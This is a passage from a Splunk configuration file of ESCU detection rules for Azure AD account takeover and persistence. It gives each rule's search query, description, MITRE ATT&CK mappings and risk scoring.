{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Successful Authentication From Different Ips - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an Azure AD account successfully authenticating from more than one unique Ip address in the span of 30 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments. action.notable.param.rule_title = Azure AD Successful Authentication From Different Ips action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=30m _time | stats count min(_time) as firstTime max(_time) as lastTime dc(src_ip) AS unique_ips values(src_ip) as src_ip values(appDisplayName) as appDisplayName by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter` [ESCU - Azure AD Successful PowerShell Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = Administrative users will likely use PowerShell commandlets to troubleshoot and maintain the environment. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Successful PowerShell Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Successful authentication for user $user$ using PowerShell. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Successful PowerShell Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules. action.notable.param.rule_title = Azure AD Successful PowerShell Authentication action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs properties.authenticationDetails{}.succeeded=true properties.appDisplayName="Microsoft Azure PowerShell" | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip, appDisplayName, user_agent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_successful_powershell_authentication_filter` [ESCU - Azure AD Successful Single-Factor Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = Although not recommended, certain users may be required without multi-factor authentication. Filter as needed action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Successful Single-Factor Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Successful authentication for user $user$ without MFA action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Successful Single-Factor Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated action.notable.param.rule_title = Azure AD Successful Single-Factor Authentication action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs properties.authenticationRequirement=singleFactorAuthentication properties.authenticationDetails{}.succeeded=true | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter` [ESCU - Azure AD Tenant Wide Admin Consent Granted - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Auditlogs log category. action.escu.known_false_positives = Legitimate applications may be granted tenant wide consent, filter as needed. action.escu.creation_date = 2023-09-14 action.escu.modification_date = 2023-09-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Tenant Wide Admin Consent Granted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Administrator $user$ consented an OAuth application for the tenant. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Tenant Wide Admin Consent Granted - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where admin consent is granted to an application within an Azure AD tenant. It leverages Azure AD audit logs, specifically events related to the admin consent action within the ApplicationManagement category. The admin consent action allows applications to access data across the entire tenant, potentially encompassing a vast amount of organizational data. Given its broad scope and the sensitivity of some permissions that can only be granted via admin consent, it's crucial to monitor this action. Unauthorized or inadvertent granting of admin consent can lead to significant security risks, including data breaches, unauthorized data access, and potential compliance violations. If an attacker successfully tricks an administrator into granting admin consent to a malicious or compromised application, they can gain extensive and persistent access to organizational data. This can lead to data exfiltration, espionage, further malicious activities within the tenant, and potential breaches of compliance regulations action.notable.param.rule_title = Azure AD Tenant Wide Admin Consent Granted action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Consent to application" | eval new_field=mvindex('properties.targetResources{}.modifiedProperties{}.newValue', 4) | rename properties.* as * | rex field=new_field "ConsentType: (?[^\,]+)" | rex field=new_field "Scope: (?[^\,]+)" | search ConsentType = "AllPrincipals" | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, targetResources{}.displayName, targetResources{}.id, ConsentType, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_tenant_wide_admin_consent_granted_filter` [ESCU - Azure AD Unusual Number of Failed Authentications From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source Ip failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\ The detection calculates the standard deviation for source Ip and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\ While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source Ip failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\ The detection calculates the standard deviation for source Ip and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\ While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category. action.escu.known_false_positives = A source Ip failing to authenticate with multiple users is not a common for legitimate behavior. action.escu.creation_date = 2022-07-11 action.escu.modification_date = 2022-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Unusual Number of Failed Authentications From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Possible Password Spraying attack against Azure AD from source ip $ipAddress$ action.risk.param._risk = [{"risk_object_field": "userPrincipalName", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "ipAddress", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Unusual Number of Failed Authentications From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg, stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1,0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter` [ESCU - Azure AD User Consent Blocked for Risky Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where Azure AD has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the Azure AD audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where Azure's built-in security measures have intervened. Applications that are flagged and blocked by Azure typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following analytic identifies instances where Azure AD has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the Azure AD audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where Azure's built-in security measures have intervened. Applications that are flagged and blocked by Azure typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = UPDATE_KNOWN_FALSE_POSITIVES action.escu.creation_date = 2023-10-27 action.escu.modification_date = 2023-10-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD User Consent Blocked for Risky Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = Azure AD has blocked $user$ attempt to grant to consent to an application deemed risky. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD User Consent Blocked for Risky Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where Azure AD has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This suggests that the application has exhibited behaviors or characteristics that are commonly associated with malicious intent or poses a security risk. This detection leverages the Azure AD audit logs, specifically focusing on events related to user consent actions and system-driven blocks. By filtering for blocked consent actions associated with applications, the analytic highlights instances where Azure's built-in security measures have intervened. Applications that are flagged and blocked by Azure typically exhibit suspicious characteristics or behaviors. Monitoring for these blocked consent attempts helps security teams identify potential threats early on and can provide insights into users who might be targeted or susceptible to such risky applications. It's an essential layer of defense in ensuring that malicious or risky applications don't gain access to organizational data. If the detection is a true positive, it indicates that the built-in security measures of O365 successfully prevented a potentially harmful application from gaining access. However, the attempt itself suggests that either a user might be targeted or that there's a presence of malicious applications trying to infiltrate the organization. Immediate investigation is required to understand the context of the block and to take further preventive measures. action.notable.param.rule_title = Azure AD User Consent Blocked for Risky Application action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Consent to application" properties.result=failure | rename properties.* as * | eval reason_index = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Reason") >= 0, mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Reason"), -1) | eval permissions_index = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions") >= 0, mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions"), -1) | search reason_index >= 0 | eval reason = mvindex('targetResources{}.modifiedProperties{}.newValue',reason_index) | eval permissions = mvindex('targetResources{}.modifiedProperties{}.newValue',permissions_index) | search reason = "\"Risky application detected\"" | rex field=permissions "Scope: (?[^,]+)" | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, reason, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_consent_blocked_for_risky_application_filter` [ESCU - Azure AD User Consent Denied for OAuth Application - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Azure AD environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the Azure AD's audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Azure AD environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the Azure AD's audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = Users may deny consent for legitimate applications by mistake, filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD User Consent Denied for OAuth Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ denied consent for an OAuth application. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD User Consent Denied for OAuth Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where a user has actively denied consent to an OAuth application seeking permissions within the Azure AD environment. This suggests that the user either recognized something suspicious about the application or chose not to grant it the requested permissions for other reasons. This detection leverages the Azure AD's audit logs, specifically focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, the analytic captures instances where users have actively rejected permission requests. While user-denied consents can be routine, they can also be indicative of users spotting potentially suspicious or unfamiliar applications. By monitoring these denied consent attempts, security teams can gain insights into applications that might be perceived as risky or untrusted by users. It can also serve as a feedback loop for security awareness training, indicating that users are being cautious about granting permissions. If the detection is a true positive, it indicates that a user has actively prevented an OAuth application from gaining the permissions it requested. While this is a proactive security measure on the user's part, it's essential for security teams to review the context of the denial. Understanding why certain applications are being denied can help in refining application whitelisting policies and ensuring that no malicious applications are attempting to gain access. action.notable.param.rule_title = Azure AD User Consent Denied for OAuth Application action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Sign-in activity" properties.status.errorCode=65004 | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, appDisplayName, status.failureReason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_consent_denied_for_oauth_application_filter` [ESCU - Azure AD User Enabled And Password Reset - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. This behavior could represent an adversary who has obtained administrative access and is trying to establish a backdoor identity within an Azure AD tenant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. This behavior could represent an adversary who has obtained administrative access and is trying to establish a backdoor identity within an Azure AD tenant. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = While not common, Administrators may enable accounts and reset their passwords for legitimate reasons. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD User Enabled And Password Reset - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A user account, $user$, was enabled and its password reset within 2 minutes by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD User Enabled And Password Reset - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. This behavior could represent an adversary who has obtained administrative access and is trying to establish a backdoor identity within an Azure AD tenant. action.notable.param.rule_title = Azure AD User Enabled And Password Reset action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` (operationName="Enable account" OR operationName="Reset password (by admin)" OR operationName="Update user") | transaction user startsWith=(operationName="Enable account") endsWith=(operationName="Reset password (by admin)") maxspan=2m | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(operationName) as operationName values(initiatedBy) as initiatedBy by user, result | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_enabled_and_password_reset_filter` [ESCU - Azure AD User ImmutableId Attribute Updated - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the modification of the SourceAnchor (also called ImmutableId) attribute for an Azure Active Directory user. Updating this attribute is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the 